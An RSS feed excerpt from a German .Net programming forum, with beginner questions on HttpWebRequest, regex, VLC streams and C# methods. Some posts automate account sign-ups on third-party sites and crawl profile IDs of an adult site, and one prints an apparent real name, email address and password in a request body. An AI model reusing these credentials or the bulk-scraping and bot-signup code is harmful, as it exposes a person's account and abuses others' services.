&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; html = .GetResponse(&quot;http://www.wer-kennt-wen.de/&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; If html.Contains(&quot;Meine Leute&quot;) Then<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; MsgBox&quot;Login Okay!&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'eingeloggt<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Else<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; MsgBox(&quot;nicht eingeloggt&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'nicht eingeloggt<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End If<br />
&nbsp; &nbsp; &nbsp; &nbsp; End With</code><hr />
</div>Mit anderen Seiten funktioniert der Code ( ich glaube die HTTP Class muss ich jetzt nicht anführen oder?) ohne Probleme.... Aber bei Wer Kennt Wen komme ich einfach nicht weiter... :/  <br />
<br />
Kann mir da wer helfen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>One Way</dc:creator>
			<guid isPermaLink="true">net-94/httpwebrequest-wer-kennt-wen-30863</guid>
		</item>
		<item>
			<title>VB.Net Regex Ausgabe bleibt leer?!</title>
			<link>net-94/regex-ausgabe-bleibt-leer-30700?goto=newpost</link>
			<pubDate>Wed, 05 Mar 2014 13:24:05 GMT</pubDate>
			<description><![CDATA[Hallöchen :)  
 
Zu Grunde liegt ein Quelltext mit folgendem Ausschnitt: 
 
Code: 
--------- 
<li class="lnavclear"><img src="./images/icons/cur.png"...]]></description>
			<content:encoded><![CDATA[<div>Hallöchen :) <br />
<br />
Zu Grunde liegt ein Quelltext mit folgendem Ausschnitt:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&lt;li class=&quot;lnavclear&quot;&gt;&lt;img src=&quot;./images/icons/cur.png&quot; title=&quot;Aktueller Preis&quot;&gt;&lt;a href=&quot;index.php?site=price&amp;from=9&amp;type=1&quot;&gt;154,80 &amp;euro;&lt;/a&gt;&lt;/li&gt;</code><hr />
</div>Egal was ich jetzt versuche um diese 154,80 ausgeben zu lassen, die Ausgabe bleibt immer leer.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&quot;&lt;li class=&quot;&quot;lnavclear&quot;&quot;&gt;&lt;img src=&quot;&quot;./images/icons/cur.png&quot;&quot; title=&quot;&quot;Aktueller Preis&quot;&quot;&gt;&lt;a href=&quot;&quot;index.php?site=price&amp;from=9&amp;type=1&quot;&quot;&gt;([^&quot;&quot;]+)&amp;euro;&lt;/a&gt;&lt;/li&gt;&quot;</code><hr />
</div>Habe schon so viele Varianten versucht aber die Ausgabe bleibt immer leer.... <br />
<br />
Kann mir da wer weiter helfen?<br />
<br />
LG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>One Way</dc:creator>
			<guid isPermaLink="true">net-94/regex-ausgabe-bleibt-leer-30700</guid>
		</item>
		<item>
			<title>VB.Net Listbox Items?</title>
			<link>net-94/listbox-items-30339?goto=newpost</link>
			<pubDate>Mon, 24 Feb 2014 19:24:36 GMT</pubDate>
			<description>Ich würde gerne einen Button so programmieren, dass er jedes Listboxite geöffnet (URLs) werden und dann der Quellcode der einzelnen Seiten in der...</description>
			<content:encoded><![CDATA[<div>Ich würde gerne einen Button so programmieren, dass er jedes Listboxite geöffnet (URLs) werden und dann der Quellcode der einzelnen Seiten in der Richtextbox &quot;abgelegt&quot; wird.<br />
<br />
Habe schon vieles probiert aber letztendlich nimmt er nur ein Item...<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"> For url_items As Integer = 0 To ListBox1.Items.Count - 1<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Form1.WebBrowser1.Navigate(&quot;http://www.link.de/&quot; + ListBox1.Items(url_items))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; RichTextBox1.AppendText(Form1.WebBrowser1.DocumentText)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Next</code><hr />
</div><br />
Kann mir da jemand helfen?<br />
<br />
LG :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>One Way</dc:creator>
			<guid isPermaLink="true">net-94/listbox-items-30339</guid>
		</item>
		<item>
			<title>VB.Net Suche Pattern für JSON String</title>
			<link>net-94/suche-pattern-fuer-json-string-29796?goto=newpost</link>
			<pubDate>Tue, 11 Feb 2014 19:45:13 GMT</pubDate>
			<description><![CDATA[Hey, 
folgender String(.json File was dann mit JavaScriptSerializer ausgelesen wird): 
 
{ 
"realm":{"name":"Frostwolf","slug":"frostwolf"},...]]></description>
			<content:encoded><![CDATA[<div>Hey,<br />
folgender String(.json File was dann mit JavaScriptSerializer ausgelesen wird):<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushSql.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: sql;">
{<br />
&quot;realm&quot;:{&quot;name&quot;:&quot;Frostwolf&quot;,&quot;slug&quot;:&quot;frostwolf&quot;},<br />
&quot;alliance&quot;:{&quot;auctions&quot;:&#91;<br />
{&quot;auc&quot;:61861645,&quot;item&quot;:74700,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:46616,&quot;buyout&quot;:51796,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:281448192},<br />
	{&quot;auc&quot;:61536691,&quot;item&quot;:34086,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:110075,&quot;buyout&quot;:120050,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:924187904},<br />
	{&quot;auc&quot;:61862171,&quot;item&quot;:74700,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:46616,&quot;buyout&quot;:51796,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:1790711168},<br />
	{&quot;auc&quot;:61536704,&quot;item&quot;:34086,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:110075,&quot;buyout&quot;:120050,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:2116196096},<br />
	{&quot;auc&quot;:61863046,&quot;item&quot;:74710,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:115107,&quot;buyout&quot;:117485,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:1272660864},<br />
	{&quot;auc&quot;:61536469,&quot;item&quot;:44087,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:440000,&quot;buyout&quot;:450000,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:0}&#93;}<br />
}
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Versuche schon seit Stunden den Inhalt zwischen <b>[</b> und <b>]</b> via RegEx zu bekommen.<br />
Sprich, als Output will ich folgendes haben:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushSql.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: sql;">
{&quot;auc&quot;:61861645,&quot;item&quot;:74700,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:46616,&quot;buyout&quot;:51796,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:281448192},<br />
	{&quot;auc&quot;:61536691,&quot;item&quot;:34086,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:110075,&quot;buyout&quot;:120050,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:924187904},<br />
	{&quot;auc&quot;:61862171,&quot;item&quot;:74700,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:46616,&quot;buyout&quot;:51796,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:1790711168},<br />
	{&quot;auc&quot;:61536704,&quot;item&quot;:34086,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:110075,&quot;buyout&quot;:120050,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:2116196096},<br />
	{&quot;auc&quot;:61863046,&quot;item&quot;:74710,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:115107,&quot;buyout&quot;:117485,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:1272660864},<br />
	{&quot;auc&quot;:61536469,&quot;item&quot;:44087,&quot;owner&quot;:&quot;Pétbank&quot;,&quot;ownerRealm&quot;:&quot;Frostwolf&quot;,&quot;bid&quot;:440000,&quot;buyout&quot;:450000,&quot;quantity&quot;:1,&quot;timeLeft&quot;:&quot;VERY_LONG&quot;,&quot;rand&quot;:0,&quot;seed&quot;:0}
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Habe schon etliche Codes probiert aber es klappt einfach nicht...<br />
<br />
MfG<br />
<br />
<br />
Edit:<br />
Super, danke dir!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/suche-pattern-fuer-json-string-29796</guid>
		</item>
		<item>
			<title>VB.Net 4fuckr ID Crawler</title>
			<link>net-94/4fuckr-id-crawler-29594?goto=newpost</link>
			<pubDate>Thu, 06 Feb 2014 18:44:39 GMT</pubDate>
			<description>Hi krieg nen Error ausgerotzt wenn ich diesen Source verwende (der source ist absolute scheisse aber sollte theoretisch gehen) 
Meine Frage warum...</description>
			<content:encoded><![CDATA[<div>Hi krieg nen Error ausgerotzt wenn ich diesen Source verwende (der source ist absolute scheisse aber sollte theoretisch gehen)<br />
Meine Frage warum krieg ich die Fehlermeldung ausgerotzt<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
        Dim count As Integer<br />
        id = 2<br />
        Try<br />
            Do<br />
                Dim lol As String = &quot;http://4fuckr.com/profile_&quot; &amp; id &amp; &quot;.htm&quot;<br />
                Dim httpRequest As HttpWebRequest = HttpWebRequest.Create(lol)<br />
                httpRequest.UserAgent = &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1&quot;<br />
                httpRequest.Proxy = Nothing<br />
                Dim httpResponse As HttpWebResponse = httpRequest.GetResponse()<br />
                Dim reader As StreamReader = New StreamReader(httpResponse.GetResponseStream)<br />
                Dim content As String = reader.ReadToEnd<br />
                Dim Ende As String = &quot;&quot;&quot;&gt;&quot;<br />
                Dim Anfang As String = &quot;&quot;&quot; title=&quot;&quot;&quot;<br />
                Dim Ziel As String<br />
                Dim Final As String<br />
                Ziel = content.Split(New String() {Anfang}, StringSplitOptions.None)(1)<br />
                Final = Ziel.Split(New String() {Ende}, StringSplitOptions.None)(0)<br />
                RichTextBox1.AppendText(Final)<br />
                count += 1<br />
                id += 1<br />
                Label2.Text = count<br />
                Thread.Sleep(&quot;500&quot;)<br />
            Loop Until count = 27000<br />
        Catch ex As Exception<br />
            MsgBox(ex.Message)
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=6439&amp;d=1391713088" border="0" alt="Name:  404.png
Hits: 464
Größe:  19,8 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
Ich weiß woran es liegt aber ich fände es nett wenn jemmand sich die zeit nimmt den source eben zu verändern sprich zu verbessern :)</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=6439&amp;stc=1&amp;d=1391713088" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/4fuckr-id-crawler-29594</guid>
		</item>
		<item>
			<title>C# Klassen- und Instanzmethoden?</title>
			<link>net-94/c-klassen-instanzmethoden-29282?goto=newpost</link>
			<pubDate>Fri, 17 Jan 2014 21:23:40 GMT</pubDate>
			<description>Hallo Leute,  
 
leider ist mir der Unterschied zwischen Klassen- und Instanzmethoden immer noch nicht eindeutig. Ich bin mir immer unsicher, wie ich...</description>
			<content:encoded><![CDATA[<div>Hallo Leute, <br />
<br />
leider ist mir der Unterschied zwischen Klassen- und Instanzmethoden immer noch nicht eindeutig. Ich bin mir immer unsicher, wie ich was erstelle. Ich hoffe, ihr könnt mich bei der Definition und beim Erstellen etwas ergänzen oder mir dazu Tipps geben.<br />
<br />
Als erstes stelle ich mir die Frage, ob die Methode etwas zurückgeben soll. Dies ist ja bei beiden Methodenarten möglich. Falls ja, gebe ich beim Erstellen der Methode einen Datentyp wie z.B. int mit an.<br />
<br />
Dann frage ich mich, ob ich auf eine Klasse oder ein Objekt zugreifen möchte:<br />
Klassenmethoden: static oder static void mit hinzu.<br />
Instanzmethoden: void oder gar nichts beifügen. <br />
<br />
Soweit das grobe Grundgerüst......<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
//Klassenmethoden<br />
class Helpers					<br />
{<br />
 	public static void zeigeTitel(string titel){ Console.Title = titel; }		<br />
	public static double quadrat(int wert){return wert*=wert;}<br />
}<br />
//Ausführung der Klassenmethoden in der Klasse Program:<br />
Helpers.zeigeTitel(&quot;Beispiel&quot;);<br />
double wert = Helpers.quadrat(5);<br />
<br />
//Instanzmethode<br />
class Helpers					<br />
{<br />
        int preis = 3;<br />
 	public int berechnePreis(int wert) {return preis*=wert;} 	<br />
 	public void print(){}<br />
}				<br />
//Ausführung der Instanzmethode in der Klasse Program:<br />
double neuerPreus = Helpers.berechnePreis(3);<br />
Objekt.print();<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Ist das alles so korrekt?<br />
<br />
Konstruktoren und Überladungen sind mir soweit eigentlich recht geläufig. Ich kann mich anfangs nur immer schlecht entscheien, welche Methodenart ich verwende..<br />
<br />
Lieben Gruß</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Gast78236</dc:creator>
			<guid isPermaLink="true">net-94/c-klassen-instanzmethoden-29282</guid>
		</item>
		<item>
			<title>VB.Net Problem mit mehreren Streams</title>
			<link>net-94/problem-mit-mehreren-streams-29269?goto=newpost</link>
			<pubDate>Thu, 16 Jan 2014 21:44:40 GMT</pubDate>
			<description>Hallo Community, 
 
ich möchte ja wie schon bekannt den TV-Player erstellen und bin auch bald so weit das eine Testversion raus kann aber jetzt kam...</description>
			<content:encoded><![CDATA[<div>Hallo Community,<br />
<br />
ich möchte ja wie schon bekannt den TV-Player erstellen und bin auch bald so weit das eine Testversion raus kann aber jetzt kam bei mir ein gravierender Fehler den ich selbst irgendwie nicht behoben bekomm.<br />
Erstmal zum Code:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Select&nbsp;</span><span style="color: #007700">Case&nbsp;</span><span style="color: #0000BB">GhostListBoxPretty1</span><span style="color: #007700">.</span><span style="color: #0000BB">SelectedItem</span><span style="color: #007700">.</span><span style="color: #0000BB">ToString<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Case&nbsp;</span><span style="color: #DD0000">"Test"<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">AxVLCPlugin21</span><span style="color: #007700">.</span><span style="color: #0000BB">playlist</span><span style="color: #007700">.</span><span style="color: #0000BB">add</span><span style="color: #007700">(</span><span style="color: #DD0000">"mmsh://212.7.196.74:80/sport"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Case&nbsp;</span><span style="color: #DD0000">"Test2"<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">AxVLCPlugin21</span><span style="color: #007700">.</span><span style="color: #0000BB">playlist</span><span style="color: #007700">.</span><span style="color: #0000BB">add</span><span style="color: #007700">(</span><span style="color: #DD0000">"http://212.250.159.9:7150/"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;Select<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AxVLCPlugin21</span><span style="color: #007700">.</span><span style="color: #0000BB">playlist</span><span style="color: #007700">.</span><span style="color: #0000BB">playItem</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">)&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Dort sieht alles schön und gut aus aber wenn ich nun den 1. Stream einschalte und will auf den 2. wechseln, startet Automatisch der 1. wieder.<br />
<br />
Was kann ich dagegen tun?<br />
<br />
Was muss ich ändern an diesen Code?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/problem-mit-mehreren-streams-29269</guid>
		</item>
		<item>
			<title>VB.Net Vlc plugin Problem</title>
			<link>net-94/vlc-plugin-problem-29258?goto=newpost</link>
			<pubDate>Thu, 16 Jan 2014 08:37:57 GMT</pubDate>
			<description>Hallo Community,  
 
Ich habe versucht über Vlc streams abspielen zu lassen aber dies funktioniert nun leider nicht.  
 
Mein Code sieht wie folgt...</description>
			<content:encoded><![CDATA[<div>Hallo Community, <br />
<br />
Ich habe versucht über Vlc streams abspielen zu lassen aber dies funktioniert nun leider nicht. <br />
<br />
Mein Code sieht wie folgt aus:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Private Sub GhostButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles GhostButton2.Click <br />
Select Case GhostListBoxPretty1.SelectedItem.ToString 'Alles an Videos soll über diese Listbox laufen.<br />
&nbsp;Case &quot;TEST&quot;<br />
&nbsp;AxVLCPlugin21.MRL = &quot;http://www.freeetv.com/modules.php?name=Video_Stream&amp;page=watch&amp;id=5406&quot; <br />
End Select</code><hr />
</div>Ich habe es auch mit wmp versucht, dies funktionierte leider auch nicht. <br />
<br />
Was kann ich nun tun?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/vlc-plugin-problem-29258</guid>
		</item>
		<item>
			<title>VB.Net Wie kann ich einfach TV-Streams in ein Programm einbinden</title>
			<link>net-94/wie-kann-ich-einfach-tv-streams-in-ein-programm-einbinden-29252?goto=newpost</link>
			<pubDate>Wed, 15 Jan 2014 20:42:09 GMT</pubDate>
			<description>/e:  
 
Habe es hin bekommen, habe nun VLC drin aber leider funktioniert es nicht so wie ich es mir dachte, ich wollte es über eine Listbox machen...</description>
			<content:encoded><![CDATA[<div>/e: <br />
<br />
Habe es hin bekommen, habe nun VLC drin aber leider funktioniert es nicht so wie ich es mir dachte, ich wollte es über eine Listbox machen und so sieht der Code aus:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"> Private Sub GhostButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles GhostButton2.Click <br />
Select Case GhostListBoxPretty1.SelectedItem.ToString 'Alles an Videos soll über diese Listbox laufen. <br />
Case &quot;TEST&quot; <br />
AxVLCPlugin21.MRL = &quot;http://www.freeetv.com/modules.php?name=Video_Stream&amp;page=watch&amp;id=5406&quot;<br />
<br />
<br />
End Select</code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/wie-kann-ich-einfach-tv-streams-in-ein-programm-einbinden-29252</guid>
		</item>
		<item>
			<title>Datei über stream empfangen Windows Phone 7/8</title>
			<link>net-94/datei-ueber-stream-empfangen-windows-phone-7-8-29244?goto=newpost</link>
			<pubDate>Wed, 15 Jan 2014 05:54:35 GMT</pubDate>
			<description>Ist es möglich am Windows Phone große Dateien per stream zu empfangen? Sprich ich connecte mich via Socket, und bekomme von der Gegenstelle ne datei....</description>
			<content:encoded><![CDATA[<div>Ist es möglich am Windows Phone große Dateien per stream zu empfangen? Sprich ich connecte mich via Socket, und bekomme von der Gegenstelle ne datei. Die will ich bei mir auf dem Phone temporär speichern. Allerdings kommt nie die komplette datei an, weil ich es nicht hinbekomm, immer nur dem Teil zu schreiben den ich grad bekomm. Versteht ihr mein Problem? <br />
<br />
Suche also eine Möglichkeit, wie man Dateien, einfach per stream empfangen kann. <br />
<br />
Bisherige Dateien kann ich euch heute Abend zukommen lassen.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Pwned</dc:creator>
			<guid isPermaLink="true">net-94/datei-ueber-stream-empfangen-windows-phone-7-8-29244</guid>
		</item>
		<item>
			<title>VB.Net HttpWebRequest - Server gibt immer falsche Meldung</title>
			<link>net-94/httpwebrequest-server-gibt-immer-falsche-meldung-29221?goto=newpost</link>
			<pubDate>Mon, 13 Jan 2014 18:31:01 GMT</pubDate>
			<description>Hallo. 
 
Ich würde gerne einen Account auf : 
 
http://member.xennews.com/signup.php 
 
per HttpWebRequest erstellen. 
 
 
Der Post sieht bei mir im...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ich würde gerne einen Account auf :<br />
<br />
<a href="http://member.xennews.com/signup.php" target="_blank" rel="nofollow">http://member.xennews.com/signup.php</a><br />
<br />
per HttpWebRequest erstellen.<br />
<br />
<br />
Der Post sieht bei mir im Programm so aus:<br />
<br />
   <br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
 Dim PoScnd As String = String.Concat(&quot;i_agree=1&amp;do_agreement=1&amp;data=a%3A13%3A%7Bs%3A10%3A%22product_id%22%3Bs%3A1%3A%222%22%3Bs%3A22%3A%22paysys_id_not_required%22%3Bs%3A14%3A%22for+javascript%22%3Bs%3A6%3A%22name_f%22%3Bs%3A4%3A%22&quot;, PreName, &quot;%22%3Bs%3A6%3A%22name_l%22%3Bs%3A3%3A%22&quot;, SirName, &quot;%22%3Bs%3A5%3A%22email%22%3Bs%3A12%3A%22&quot;, Email, &quot;%22%3Bs%3A5%3A%22login%22%3Bs%3A5%3A%22&quot;, Emaill.Split(&quot;@&quot;c)(0), &quot;%22%3Bs%3A5%3A%22pass0%22%3Bs%3A6%3A%22&quot;, Pass, &quot;%22%3Bs%3A5%3A%22pass1%22%3Bs%3A6%3A%22&quot;, Pass, &quot;%22%3Bs%3A6%3A%22coupon%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22do_payment%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22price_group%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22aff_id%22%3BN%3Bs%3A9%3A%22paysys_id%22%3Bs%3A4%3A%22free%22%3B%7D&quot;)
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
<br />
Habe dann mal aus meinem Programm den Post in eine .txt geschrieben, sieht so aus:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
i_agree=1&amp;do_agreement=1&amp;data=a%3A13%3A%7Bs%3A10%3A%22product_id%22%3Bs%3A1%3A%222%22%3Bs%3A22%3A%22paysys_id_not_required%22%3Bs%3A14%3A%22for+javascript%22%3Bs%3A6%3A%22name_f%22%3Bs%3A4%3A%22Dennis%22%3Bs%3A6%3A%22name_l%22%3Bs%3A3%3A%22Kozak%22%3Bs%3A5%3A%22email%22%3Bs%3A12%3A%22OverAllMountains%40gmx.de%22%3Bs%3A5%3A%22login%22%3Bs%3A5%3A%22OverAllMountains%22%3Bs%3A5%3A%22pass0%22%3Bs%3A6%3A%22MangoE4%22%3Bs%3A5%3A%22pass1%22%3Bs%3A6%3A%22MangoE4%22%3Bs%3A6%3A%22coupon%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22do_payment%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22price_group%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22aff_id%22%3BN%3Bs%3A9%3A%22paysys_id%22%3Bs%3A4%3A%22free%22%3B%7D
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
<br />
Leider enthält die Serverantwort immer den String &quot;Please enter a valid&quot; , was <br />
auszeichnet, dass der Account nicht gültig ist, komischerweise.<br />
<br />
Kann mir jemand sagen, was ich da falsch mache?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/httpwebrequest-server-gibt-immer-falsche-meldung-29221</guid>
		</item>
		<item>
			<title>C# xsusenet.com Registrierung durchführen</title>
			<link>net-94/c-xsusenet-com-registrierung-durchfuehren-29171?goto=newpost</link>
			<pubDate>Thu, 09 Jan 2014 17:31:40 GMT</pubDate>
			<description>Ich würde gerne auf der Seite https://www.xsusenet.com/client/signup.php eine Registrierung durchführen  
per HttpWebrequest. 
 
Wie ich derzeit...</description>
			<content:encoded><![CDATA[<div>Ich würde gerne auf der Seite <a href="https://www.xsusenet.com/client/signup.php" target="_blank" rel="nofollow">https://www.xsusenet.com/client/signup.php</a> eine Registrierung durchführen <br />
per HttpWebrequest.<br />
<br />
Wie ich derzeit vorgehe:<br />
<br />
-Ich habe einen globalen Cookiecontainer , über den alles läuft.<br />
<br />
1. GET Request der Seite <a href="https://www.xsusenet.com/client/signup.php" target="_blank" rel="nofollow">https://www.xsusenet.com/client/signup.php</a> um die 3 Sessionids auszulesen.<br />
